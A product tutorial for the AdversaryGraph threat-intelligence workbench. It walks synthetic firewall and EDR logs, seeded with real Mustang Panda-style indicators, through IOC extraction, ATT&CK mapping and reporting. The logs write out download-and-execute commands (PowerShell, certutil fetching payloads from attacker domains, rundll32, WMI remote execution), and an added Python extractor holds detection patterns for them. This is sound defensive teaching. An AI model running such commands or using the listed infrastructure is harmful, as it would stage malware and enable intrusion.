AdversaryGraph v3.0 workflow

From Log to Report: Using AdversaryGraph to Turn Firewall and EDR Noise Into a CTI Investigation

A practical workflow for moving from raw telemetry to IOC extraction, enrichment, relationship graph review, ATT&CK technique leads, and an analyst-ready report.

The scenario below uses synthetic firewall and EDR telemetry seeded with real IOC examples from a Mustang Panda / RedDelta-style CTI dataset. The logs are lab data, not victim telemetry. Actor names are treated as investigation leads, not attribution conclusions.

About AdversaryGraph

AdversaryGraph is a self-hosted AI-assisted CTI-to-detection workbench. It connects raw evidence, threat intelligence, ATT&CK mapping, IOC enrichment, actor context, relationship graph pivots, and report generation into one local workflow.

The core path is simple: raw evidence -> IOC extraction -> enrichment -> relationship graph -> ATT&CK mapping -> report.

The Investigation Goal

The analyst starts with two noisy inputs: firewall logs showing repeated outbound traffic and EDR logs showing suspicious PowerShell, discovery commands, unsigned payload staging, and remote execution leads.

  1. Extract useful observables from raw logs.
  2. Identify suspicious behavior and likely ATT&CK techniques.
  3. Send extracted IOCs into IOC Investigation.
  4. Enrich the IOCs through local DB, OpenCTI, OTX, VirusTotal, urlscan, ThreatFox, and other configured sources.
  5. Review relationships, evidence ranking, source conflicts, actor leads, and TTP leads.
  6. Generate a structured report with the AI assistant.

Synthetic Firewall Logs

The firewall sample simulates repeated outbound connections from one workstation to suspicious IPs and domains.

2026-06-20T08:14:11Z FW01 ALLOW src=10.44.18.23 src_host=FIN-WS-042 dst=103.119.47.104 dst_port=443 sni=power-sync-services.com
2026-06-20T08:17:44Z FW01 ALLOW src=10.44.18.23 src_host=FIN-WS-042 dst=38.60.245.37 dst_port=443 sni=gatewayrvcenter.com
2026-06-20T08:24:31Z FW01 ALLOW src=10.44.18.23 src_host=FIN-WS-042 dst=38.60.245.37 dst_port=80 url=http://metakit.fireant.vn/Software/version.xml
2026-06-20T08:24:35Z FW01 ALLOW src=10.44.18.23 src_host=FIN-WS-042 dst=38.60.245.37 dst_port=80 url=http://metakit.fireant.vn/Software/setup.exe
2026-06-20T08:31:42Z FW01 ALLOW src=10.44.18.23 src_host=FIN-WS-042 dst=38.60.245.37 dst_port=443 sni=m.flach.cn note=opencti-indicator-alias-reddelta

The pattern matters more than one line: repeated outbound communication, HTTP retrieval of `version.xml` and `setup.exe`, and CTI-linked infrastructure.

Synthetic EDR Logs

2026-06-20T08:24:38Z EDR process_start parent=WINWORD.EXE process=powershell.exe cmd="Invoke-WebRequest -Uri http://metakit.fireant.vn/Software/setup.exe -OutFile C:\ProgramData\Microsoft\setup.exe"
2026-06-20T08:24:51Z EDR file_create path=C:\ProgramData\Microsoft\setup.exe sha256=eb52d1791fc861e459ee14f15ef8d4819a4afde3ac7ce5e8cebdcd5f7840925f signer=unsigned
2026-06-20T08:25:31Z EDR process_start parent=setup.exe process=cmd.exe cmd="cmd.exe /c whoami /all && hostname && ipconfig /all"
2026-06-20T08:26:12Z EDR process_start parent=setup.exe process=nltest.exe cmd="nltest.exe /dclist:corp.local"
2026-06-20T08:27:20Z EDR process_start parent=setup.exe process=rundll32.exe cmd="rundll32.exe C:\ProgramData\Microsoft\msupdate.dat,StartW"
2026-06-20T08:32:03Z EDR process_start parent=rundll32.exe process=wmic.exe cmd="wmic.exe /node:FIN-FS-01 process call create \"cmd.exe /c whoami\""
2026-06-20T08:36:12Z EDR process_start parent=rundll32.exe process=certutil.exe cmd="certutil.exe -urlcache -split -f http://gatewayrvcenter.com/payload.dat C:\ProgramData\Microsoft\cache.bin"

Step 1: Paste Logs Into AI Log Analysis

In AI Analysis, paste the firewall and EDR logs and ask AdversaryGraph to extract IOCs, suspicious commands, suspicious processes, possible ATT&CK techniques, kill-chain context, and actor or malware leads. The prompt should explicitly say not to claim attribution and to show evidence for every finding.

Step 2: Extract IOCs And Suspicious Activity

| Type | Examples |
| --- | --- |
| IPs | 103.119.47.104, 38.60.245.37, 166.88.77.186 |
| Domains | power-sync-services.com, gatewayrvcenter.com, metakit.fireant.vn, m.flach.cn |
| URLs | http://metakit.fireant.vn/Software/setup.exe, http://power-sync-services.com/update/check |
| Hashes | eb52d1791fc861e459ee14f15ef8d4819a4afde3ac7ce5e8cebdcd5f7840925f, fd2c2f1bf90592604febf404e5579f89 |

| Technique lead | Why |
| --- | --- |
| T1059 / T1059.001 | PowerShell and command execution. |
| T1105 | Download of `setup.exe` and `payload.dat`. |
| T1071.001 | HTTP/HTTPS C2-like traffic. |
| T1218.011 | `rundll32.exe` executing a suspicious payload. |
| T1047 | WMI remote execution lead. |
| T1036 | Masqueraded file names and Microsoft-looking staging path. |
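As an added example (not AdversaryGraph's own code), a small Python extractor that does what Steps 1 and 2 ask the AI assistant to do: pull external IPs, domains, URLs and hashes from the synthetic lines above and record, per ATT&CK technique lead, the line numbers that serve as evidence. The technique rules and the sample subset are assumptions modelled on the table, not output from the tool.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample: a subset of the page's synthetic firewall/EDR lines (lab data).
SAMPLE_LOGS = r"""
2026-06-20T08:14:11Z FW01 ALLOW src=10.44.18.23 src_host=FIN-WS-042 dst=103.119.47.104 dst_port=443 sni=power-sync-services.com
2026-06-20T08:24:35Z FW01 ALLOW src=10.44.18.23 src_host=FIN-WS-042 dst=38.60.245.37 dst_port=80 url=http://metakit.fireant.vn/Software/setup.exe
2026-06-20T08:24:38Z EDR process_start parent=WINWORD.EXE process=powershell.exe cmd="Invoke-WebRequest -Uri http://metakit.fireant.vn/Software/setup.exe -OutFile C:\ProgramData\Microsoft\setup.exe"
2026-06-20T08:24:51Z EDR file_create path=C:\ProgramData\Microsoft\setup.exe sha256=eb52d1791fc861e459ee14f15ef8d4819a4afde3ac7ce5e8cebdcd5f7840925f signer=unsigned
2026-06-20T08:27:20Z EDR process_start parent=setup.exe process=rundll32.exe cmd="rundll32.exe C:\ProgramData\Microsoft\msupdate.dat,StartW"
2026-06-20T08:32:03Z EDR process_start parent=rundll32.exe process=wmic.exe cmd="wmic.exe /node:FIN-FS-01 process call create \"cmd.exe /c whoami\""
2026-06-20T08:36:12Z EDR process_start parent=rundll32.exe process=certutil.exe cmd="certutil.exe -urlcache -split -f http://gatewayrvcenter.com/payload.dat C:\ProgramData\Microsoft\cache.bin"
"""

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s\"\\]+")
SNI_RE = re.compile(r"\bsni=([\w.-]+)")
HASH_RE = re.compile(r"\b[0-9a-f]{64}\b|\b[0-9a-f]{32}\b")  # SHA-256 first, then MD5

# Assumed detection rules mirroring the technique-lead table; each is (technique, regex).
TECHNIQUE_RULES = [
    ("T1059.001", r"process=powershell\.exe"),
    ("T1105", r"Invoke-WebRequest|certutil\.exe -urlcache"),
    ("T1218.011", r"process=rundll32\.exe"),
    ("T1047", r"process=wmic\.exe .*?/node:"),
    ("T1036", r"path=C:\\ProgramData\\Microsoft\\.*signer=unsigned"),
]


def _is_external(ip: str) -> bool:
    """True for routable addresses; internal 10.x workstations are context, not IOCs."""
    try:
        return not ipaddress.ip_address(ip).is_private
    except ValueError:
        return False


def extract_iocs(log_text: str) -> dict:
    """Return sorted external IPs, domains, URLs and file hashes found in the log text."""
    iocs = {"ips": set(), "domains": set(), "urls": set(), "hashes": set()}
    for line in log_text.strip().splitlines():
        iocs["ips"].update(ip for ip in IPV4_RE.findall(line) if _is_external(ip))
        for url in URL_RE.findall(line):
            iocs["urls"].add(url)
            iocs["domains"].add(urlparse(url).hostname)
        iocs["domains"].update(SNI_RE.findall(line))
        iocs["hashes"].update(HASH_RE.findall(line))
    return {k: sorted(v) for k, v in iocs.items()}


def technique_leads(log_text: str) -> dict:
    """Map each technique lead to the 1-based log line numbers that evidence it."""
    leads = defaultdict(list)
    for n, line in enumerate(log_text.strip().splitlines(), 1):
        for technique, pattern in TECHNIQUE_RULES:
            if re.search(pattern, line, re.IGNORECASE):
                leads[technique].append(n)
    return dict(leads)
```

The line numbers kept with each technique are the "show evidence for every finding" requirement from Step 1 in machine-checkable form, ready to hand to IOC Investigation alongside the observables.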

Step 3: Investigate Extracted IOCs

Open IOC Investigation, submit the strongest IOC, and run Tier 1 / Tier 2 / Tier 3 enrichment. AdversaryGraph queries enabled sources, including local DB, OpenCTI, OTX, VirusTotal, urlscan, ThreatFox, Malpedia, GreyNoise Community, AbuseIPDB, Shodan, and Censys when configured.

Step 4: Review The Relationship Graph

The relationship graph is the analyst pivot map. Nodes can represent the root IOC, related domains, IPs, actor leads, malware labels, tags, source references, and TTP leads. Each node can be opened or reinvestigated, and focused graph mode hides noisy context until needed.

Step 5: Generate The Report

After evidence review, send the investigation context to the report workflow. A strong output includes the IOC type, suspiciousness rationale, source evidence, TTP leads, actor-lead caveats, kill-chain interpretation, recommended pivots, and defensive actions.

Why This Workflow Matters

Most platforms can list alerts. The value here is the workflow: extract evidence, enrich it, preserve the uncertainty, connect it to ATT&CK, and create a report that another analyst can audit.

AdversaryGraph is not an attribution engine. It is a workbench for producing better CTI and detection handoff faster while keeping source context visible.